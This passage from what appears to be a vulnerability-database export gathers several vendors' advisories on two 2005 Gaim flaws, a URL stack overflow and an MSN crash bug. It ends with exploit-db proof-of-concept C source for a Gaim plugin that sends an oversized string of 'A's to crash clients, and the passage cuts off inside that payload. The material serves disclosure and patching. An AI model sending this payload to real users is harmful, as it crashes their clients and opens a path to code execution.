"gaim", "packageFilename": "gaim-1.2.1-6.el4.s390.rpm", "arch": "s390", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": "gaim", "packageFilename": "gaim-1.2.1-6.el4.s390x.rpm", "arch": "s390x", "operator": "lt"}], "description": "The Gaim application is a multi-protocol instant messaging client.\r\n\r\nA stack based buffer overflow bug was found in the way gaim processes a\r\nmessage containing a URL. A remote attacker could send a carefully crafted\r\nmessage resulting in the execution of arbitrary code on a victim's machine.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1261 to this issue.\r\n\r\nA bug was found in the way gaim handles malformed MSN messages. A remote\r\nattacker could send a carefully crafted MSN message causing gaim to crash.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1262 to this issue.\r\n\r\nUsers of Gaim are advised to upgrade to this updated package which contains\r\nbackported patches and is not vulnerable to these issues.", "reporter": "RedHat", "published": "2005-05-11T04:00:00", "type": "redhat", "title": "(RHSA-2005:429) gaim security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-1261", "CVE-2005-1262"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:50:06", "id": "RHSA-2005:429", "href": "https://access.redhat.com/errata/RHSA-2005:429", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-15T06:36:52", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "2", "packageVersion": "0.59.9-4.el2", "arch": "ia64", "packageFilename": "gaim-0.59.9-4.el2.ia64.rpm", "packageName": "gaim", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "0.59.9-4.el2", "arch": "i386", "packageFilename": "gaim-0.59.9-4.el2.i386.rpm", "packageName": "gaim", "operator": "lt"}], "description": "The Gaim application is a multi-protocol instant messaging client.\r\n\r\nA stack based buffer overflow bug was found in the way gaim processes a\r\nmessage containing a URL. A remote attacker could send a carefully crafted\r\nmessage resulting in the execution of arbitrary code on a victim's machine.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2005-1261 to this issue.\r\n\r\nA bug in the way Gaim processes SNAC packets was discovered. It is possible\r\nthat a remote attacker could send a specially crafted SNAC packet to a Gaim\r\nclient, causing the client to stop responding. The Common Vulnerabilities\r\nand Exposures project (cve.mitre.org) has assigned the name CAN-2005-0472\r\nto this issue.\r\n\r\nUsers of Gaim are advised to upgrade to this updated package which contains\r\ngaim version 0.59.9 with backported patches to correct these issues.", "reporter": "RedHat", "published": "2005-05-11T04:00:00", "type": "redhat", "title": "(RHSA-2005:432) gaim security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-0472", "CVE-2005-1261"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-14T19:27:52", "id": "RHSA-2005:432", "href": "https://access.redhat.com/errata/RHSA-2005:432", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:55", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1261", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1262", "https://bugs.gentoo.org/show_bug.cgi?id=91862"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.3.0", "packageName": "net-im/gaim", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nGaim is a full featured instant messaging client which handles a variety of instant messaging protocols. \n\n### Description\n\nStu Tomlinson discovered that Gaim is vulnerable to a remote stack based buffer overflow when receiving messages in certain protocols, like Jabber and SILC, with a very long URL (CAN-2005-1261). Siebe Tolsma discovered that Gaim is also vulnerable to a remote Denial of Service attack when receiving a specially crafted MSN message (CAN-2005-1262). \n\n### Impact\n\nA remote attacker could cause a buffer overflow by sending an instant message with a very long URL, potentially leading to the execution of malicious code. By sending a SLP message with an empty body, a remote attacker could cause a Denial of Service or crash of the Gaim client. \n\n### Workaround\n\nThere are no known workarounds at this time. \n\n### Resolution\n\nAll Gaim users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/gaim-1.3.0\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2005-05-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Gaim: Denial of Service and buffer overflow vulnerabilties", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "modified": "2005-05-12T00:00:00", "id": "GLSA-200505-09", "href": "https://security.gentoo.org/glsa/200505-09", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:47", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2005-1261", "https://people.canonical.com/~ubuntu-security/cve/CVE-2005-0967"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim-data", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "4.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim-data", "operator": "lt"}], "description": "Marco Alvarez found a Denial of Service vulnerability in the Jabber protocol handler. A remote attacker could exploit this to crash Gaim by sending specially crafted file transfers to the user. (CAN-2005-0967)\n\nStu Tomlinson discovered an insufficient bounds checking flaw in the URL parser. By sending a message containing a very long URL, a remote attacker could crash Gaim or execute arbitrary code with the privileges of the user. This was not possible on all protocols, due to message length restrictions. Jabber are SILC were known to be vulnerable. (CAN-2005-1261)\n\nSiebe Tolsma discovered a Denial of Service attack in the MSN handler. By sending a specially crafted SLP message with an empty body, a remote attacker could crash Gaim. (CAN-2005-1262)", "edition": 3, "reporter": "Ubuntu", "published": "2005-05-13T00:00:00", "title": "Gaim vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-0967", "CVE-2005-1262", "CVE-2005-1261"], "modified": "2005-05-13T00:00:00", "id": "USN-125-1", "href": "https://usn.ubuntu.com/125-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://gaim.sourceforge.net/\n[Vendor Specific Advisory URL](http://gaim.sourceforge.net/security/index.php?id=16)\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200505-09.xml)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/support/documentation/usn/usn-125-1)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000964)\n[Vendor Specific Advisory URL](http://archives.mandrivalinux.com/security-announce/2005-05/msg00007.php)\nSecurity Tracker: 1013942\n[Secunia Advisory ID:15334](https://secuniaresearch.flexerasoftware.com/advisories/15334/)\n[Secunia Advisory ID:15328](https://secuniaresearch.flexerasoftware.com/advisories/15328/)\n[Secunia Advisory ID:15679](https://secuniaresearch.flexerasoftware.com/advisories/15679/)\n[Related OSVDB ID: 16348](https://vulners.com/osvdb/OSVDB:16348)\nRedHat RHSA: RHSA-2005:429\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Jun/0004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0183.html\n[CVE-2005-1261](https://vulners.com/cve/CVE-2005-1261)\n", "reporter": "OSVDB", "published": "2005-05-10T07:04:01", "type": "osvdb", "title": "Gaim Multiple Protocol URL Processing Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2005-1261"], "modified": "2005-05-10T07:04:01", "href": "https://vulners.com/osvdb/OSVDB:16347", "id": "OSVDB:16347", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "references": [], "edition": 1, "description": "## Vulnerability Description\nGaim contains a flaw that may allow a remote denial of service. The issue is triggered when a client sends an SLP message with an empty body, and will result in loss of availability for the application.\n## Solution Description\nUpgrade to version 1.3.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nGaim contains a flaw that may allow a remote denial of service. The issue is triggered when a client sends an SLP message with an empty body, and will result in loss of availability for the application.\n## References:\nVendor URL: http://gaim.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200505-09.xml)\n[Vendor Specific Advisory URL](http://www.ubuntulinux.org/support/documentation/usn/usn-125-1)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000964)\n[Vendor Specific Advisory URL](http://gaim.sourceforge.net/security/index.php?id=17)\n[Vendor Specific Advisory URL](http://archives.mandrivalinux.com/security-announce/2005-05/msg00007.php)\nSecurity Tracker: 1013942\n[Secunia Advisory ID:15334](https://secuniaresearch.flexerasoftware.com/advisories/15334/)\n[Secunia Advisory ID:16050](https://secuniaresearch.flexerasoftware.com/advisories/16050/)\n[Secunia Advisory ID:15328](https://secuniaresearch.flexerasoftware.com/advisories/15328/)\n[Related OSVDB ID: 16347](https://vulners.com/osvdb/OSVDB:16347)\nRedHat RHSA: RHSA-2005:429\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Jul/0004.html\n[CVE-2005-1262](https://vulners.com/cve/CVE-2005-1262)\n", "reporter": "Siebe Tolsma()", "published": "2005-05-10T07:04:01", "type": "osvdb", "title": "Gaim Malformed MSN Message Remote DoS", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "gaim", "version": "0.x", "operator": "eq"}, {"name": "gaim", "version": "1.0.x", "operator": "eq"}, {"name": "gaim", "version": "1.2.x", "operator": "eq"}, {"name": "gaim", "version": "1.1.x", "operator": "eq"}], "cvelist": ["CVE-2005-1262"], "modified": "2005-05-10T07:04:01", "href": "https://vulners.com/osvdb/OSVDB:16348", "id": "OSVDB:16348", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:59", "references": ["http://gaim.sourceforge.net/security/index.php?id=17"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ru-gaim", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ko-gaim", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ja-gaim", "operator": "lt"}], "description": "\nThe GAIM team reports:\n\nPotential remote denial of service bug resulting from not\n\t checking a pointer for non-NULL before passing it to\n\t strncmp, which results in a crash. This can be triggered\n\t by a remote client sending an SLP message with an empty\n\t body.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2005-05-10T00:00:00", "title": "gaim -- MSN remote DoS vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-1262"], "modified": "2005-05-10T00:00:00", "id": "AD5E70BB-C429-11D9-AC59-02061B08FC24", "href": "https://vuxml.freebsd.org/freebsd/ad5e70bb-c429-11d9-ac59-02061b08fc24.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:15:59", "references": ["http://gaim.sourceforge.net/security/index.php?id=16"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gaim", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ru-gaim", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ko-gaim", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.3.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "ja-gaim", "operator": "lt"}], "description": "\nThe GAIM team reports that GAIM is vulnerable to a\n\t denial-of-service vulnerability which can cause GAIM to\n\t crash:\n\nIt is possible for a remote user to overflow a static\n\t buffer by sending an IM containing a very large URL\n\t (greater than 8192 bytes) to the Gaim user. This is not\n\t possible on all protocols, due to message length\n\t restrictions. Jabber are SILC are known to be\n\t vulnerable.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2005-05-10T00:00:00", "title": "gaim -- remote crash on some protocols", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2005-1261"], "modified": "2005-05-10T00:00:00", "id": "889061AF-C427-11D9-AC59-02061B08FC24", "href": "https://vuxml.freebsd.org/freebsd/889061af-c427-11d9-ac59-02061b08fc24.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:20:56", "osvdbidlist": ["16347"], "references": [], "edition": 1, "description": "Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit. CVE-2005-1261. Dos exploit for linux platform", "reporter": "Ron", "published": "2005-05-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "exploitdb", "title": "Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1261"], "modified": "2005-05-17T00:00:00", "id": "EDB-ID:999", "href": "https://www.exploit-db.com/exploits/999/", "sourceData": "// Written by Ron <iago@valhallalegends.com>\r\n// Friday, May 13, 2005\r\n//\r\n// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability\r\n// when processing email addresses. What this basically does is segfault you when you\r\n// do a /vuln command in a conversation, and, if you're using a protocol that allows\r\n// a 10002-character message to go through, also segfaults the person you sent it to.\r\n// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, and\r\n// the return address of the function ends up at 0x41414141. That's no good for\r\n// anybody.\r\n//\r\n// This code should be considered public domain, and is freely modifiable/distributable\r\n// by any and everyone.\r\n//\r\n// Note:\r\n// To compile, place this in the \"plugins\" directory of Gaim's source\r\n// (gaim-1.2.1/plugins) and type \"make vuln-plugin.so\". This will compile vuln-plugin.so.\r\n// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.\r\n\r\n#include <unistd.h>\r\n#include <ctype.h>\r\n#include <string.h>\r\n#include <locale.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#include \"internal.h\"\r\n#include \"gtkgaim.h\"\r\n\r\n#include \"debug.h\"\r\n#include \"signals.h\"\r\n#include \"util.h\"\r\n#include \"version.h\"\r\n#include \"cmds.h\"\r\n#include \"conversation.h\"\r\n\r\n#include \"gtkplugin.h\"\r\n#include \"gtkutils.h\"\r\n\r\n#define ME \"1.2.1 Vuln Check\"\r\n#define MAXLENGTH 1024\r\n#define XMMS_PLUGIN_VERSION \"I am a test plugin to check for URL encoding vulnerability.\"\r\n\r\nstatic GaimCmdId cmd;\r\n\r\nchar *code = \"A@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA